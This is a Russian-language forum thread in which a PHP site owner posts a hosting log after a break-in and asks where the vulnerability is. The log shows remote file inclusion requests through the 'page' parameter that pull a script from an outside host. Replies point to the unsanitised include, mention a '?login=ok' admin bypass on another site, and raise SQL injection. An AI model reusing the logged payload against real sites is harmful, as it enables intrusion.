Вопрос такой. У меня на хостинге peterhost.ru размещен свой сайт (портфолио). Недавно он перестал работать. Я обратился в службу техподдержки и мне сказали, что сайт был взломан, вся информация о взломе в файле hack.log (ниже приведу его листинг). Велели устранить уязвимость и дать знать им. Я, если честно, даже и не представляю где там может быть уязвимость. Текст файла: batmast 4889 0.0 0.5 800904 43752 ?? IV 2:32AM 0:00.23 httpd: batmast - www.batmaster.ru - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 ( batmast 52916 0.0 0.0 777516 2012 ?? IV Sun05PM 0:00.13 httpd: batmast - www.batmaster.ru - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 ( batmast 64710 0.0 0.0 0 0 ?? Z Sun06PM 0:00.08 <defunct> batmast 64715 0.0 0.0 23732 1124 ?? I Sun06PM 0:00.59 httpds (perl5.8.8) (batmast - это мой логин) Все адреса у меня имеют формат типа такого batmaster.ru/index.php?page=main (т.е. например страница main). Подскажите, что делать
дырок у тебя наверняка море. то что видно: ты позволяешь в свой скрипт добавлять чужие. хостинг тоже конечно хорош, открыты инклуды наружу.
У Вас же на сайте написано, что Вы - веб-разработчик, знаете PHP =\ Это Вы сделали столько сайтов, оставив во всех такие дырки?
Вообще, что-то на рекламу смахивает. Да и не верю я, что сделав столько сайтов, можно так лохануться, да и еще не понимать таких вещей.
Сам видел один быдло чудо-движок, на котором работает не менее одного достаточно серьёзного сайта (типа фирмы-торговца автомобилями), для входа в админ-панель которого достаточно в строке адреса дописать нечто типа ?login=ok :-D
Kreker кому такая реклама нужна? на сайтах в портфеле такая же фигня, а он sql инекций походу спасают только магические кавычки